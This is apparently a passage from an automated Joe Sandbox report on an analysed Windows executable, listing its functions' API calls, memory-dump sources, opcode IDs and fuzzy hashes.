                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE08CB0A04708ABC710EF78CC8481EBABCAA54320B90462CF5A5C32D1C234A9408B36
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                                                                              • Opcode ID: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                                              • Instruction ID: 75174e167af6e085340da124bff1779b24b122a40ba15240be09f0de69b02ea8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12D05E70B042056BC700EF78D808A1B7AF9AB90744F40C43CA985C3240FA74D8018B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                                                              • Opcode ID: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                                              • Instruction ID: dd570ae04773ec1d9248e7accc602cb5589f5768ce779b06ba6b6fcb8a9dd89b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2F0F8B05047049AC320BF789D4841A76A8AB81329BA44B3DF5B4E62E0D73894628B6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                              • Opcode ID: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                                              • Instruction ID: c8608c254b430b602e84f9c27618fc09d2b238f80b7c42c251c9764424cdbd58
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9D067B45043049FD300FF6CD54970ABBE4AB44344F80C828E98897251D679D4548B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32 ref: 00401855
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                                                                                                                                                              • Instruction ID: 66959b0bba6a1c3021cfc6ef215295b74c1233013eb20c9b72e5f533845a5747
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33D0A7B010C201DED3006F248C0053BB6F4AF84300F20863DF0C6A31E4C334C8836B2A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              • API String ID: 1085758737-2684343615
                                                                                                                                                                                                                                                              • Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                                              • Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405CAA
                                                                                                                                                                                                                                                              • SetWindowTextA.USER32 ref: 00405CE6
                                                                                                                                                                                                                                                                • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
                                                                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 00405FD2
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
                                                                                                                                                                                                                                                              • String ID: A$Lq
                                                                                                                                                                                                                                                              • API String ID: 2917460849-3136341169
                                                                                                                                                                                                                                                              • Opcode ID: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                                              • Instruction ID: 826313f772001043a55ea6ee256f7e169a774654cc20dc23f9f2a1aa091d3067
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FD128B09087049FDB10EF69D58466EBBF4FF44304F51893EE888A7281D7789985CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32 ref: 00402A22
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000), ref: 00402B6F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                              • String ID: 4A
                                                                                                                                                                                                                                                              • API String ID: 123533781-205151761
                                                                                                                                                                                                                                                              • Opcode ID: ecb612db5eae3566e926ef45e64615f90559cffa0a4e7bcadb3d1b0ad6a2cce0
                                                                                                                                                                                                                                                              • Instruction ID: d305ef95405f15bde97fa7dd711ba6fc9ffd0a80db07f91d6d56198472658b67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecb612db5eae3566e926ef45e64615f90559cffa0a4e7bcadb3d1b0ad6a2cce0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51614CB0A087119FD710EF69C9886AABBF4FF88314F008AADE58897391D7749885CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                                              • Opcode ID: fce1d974e300f46887b22a37e71dcc213f53c6413cec510bd16856115e4e31a8
                                                                                                                                                                                                                                                              • Instruction ID: aef6cf25d155275a0f1f0dba3ae7dc856cfafe516e6fd3ce68bd1cca54722f2f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fce1d974e300f46887b22a37e71dcc213f53c6413cec510bd16856115e4e31a8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8401B1B1A086009FD310DF25CC44AAAFBF8EF84314F50847FE489A3281D73456458B66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ItemMessageSendWindow$ClassDestroyDialogEnableLongMenuShowText
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1257292352-0
                                                                                                                                                                                                                                                              • Opcode ID: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                                              • Instruction ID: 81f075938f45a7985b655ae660e62a259a3a74716ec96c8beebe6fa6edba758e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B12EDB0904700EFD720AF69D98876FBBF4EB84714F50893EE88497290D7789885DF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Item$Cursor$ButtonCheckColorExecuteShell
                                                                                                                                                                                                                                                              • String ID: #$Lq
                                                                                                                                                                                                                                                              • API String ID: 3348721118-2799278461
                                                                                                                                                                                                                                                              • Opcode ID: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                                              • Instruction ID: 44f7cc544d88e5f9b0c99828474254857af221e4d6201ddb95d9c50adba5cc38
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5B1E7B0908704AFD710AF69D58876EBBF0FF44314F40892DE889A7381D779A885CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              • API String ID: 2207649800-2684343615
                                                                                                                                                                                                                                                              • Opcode ID: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                                              • Instruction ID: 8fd51326f023e27f82ac7456779bc240a2534a06902e8bdd8a27472bfc587b1b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 046115B09047089FCB24DFA9C9885AEBBF8FF88310F50892EE499D7251D734A845DF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 0040839D
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 004083C8
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004083FF
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32 ref: 0040845A
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 00408476
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?), ref: 004084A2
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00408568
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 0040858B
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00408597
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 004085A1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?), ref: 00407EE6
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00407F25
                                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00407FC6
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
                                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32 ref: 00408018
                                                                                                                                                                                                                                                              • SHGetPathFromIDListA.SHELL32 ref: 00408073
                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32 ref: 00408084
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(759205F0), ref: 004034EF
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 0040351C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00403653
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403561
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004035D6
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 00403606
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00403612
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: SetFilePointer.KERNEL32 ref: 00403D89
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403DD5
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403E9A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Global$Read$AllocFreePointer$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2143033257-0
                                                                                                                                                                                                                                                              • Opcode ID: d7e3919c8c286aedf3d5e9b6ec29653afd9aab18416f1c8313dee9fff56ac6e6
                                                                                                                                                                                                                                                              • Instruction ID: 4c510bf6e2d4d1f92ab55f121e890243c90c0ce65b69a7146e7506ad40f7442f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e3919c8c286aedf3d5e9b6ec29653afd9aab18416f1c8313dee9fff56ac6e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51510BB0A087009FD710EF29C844B6EBBF4AF84315F01896EE598E7391D7389985CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectwsprintf
                                                                                                                                                                                                                                                              • String ID: H$Z
                                                                                                                                                                                                                                                              • API String ID: 1586071882-4221459494
                                                                                                                                                                                                                                                              • Opcode ID: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
                                                                                                                                                                                                                                                              • Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403A48
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00403A83
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              • CreateDialogParamA.USER32 ref: 00403AC3
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 00403ADC
                                                                                                                                                                                                                                                                • Part of subcall function 0040392C: MulDiv.KERNEL32 ref: 00403953
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSendWindow$CountCreateDestroyDialogParamShowTextTickwsprintf
                                                                                                                                                                                                                                                              • String ID: o
                                                                                                                                                                                                                                                              • API String ID: 2510787843-252678980
                                                                                                                                                                                                                                                              • Opcode ID: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction ID: 81059e3b479639814b0572c15c12751123e1a1ca33ddd0d88914a755a74492f9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB21FCB06083059FD710AF65E58875A7FE8FB44309F40843EE4C5A72A1DB798585CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextTimerWindowwsprintf
                                                                                                                                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%$Lq
                                                                                                                                                                                                                                                              • API String ID: 2438957755-692697396
                                                                                                                                                                                                                                                              • Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
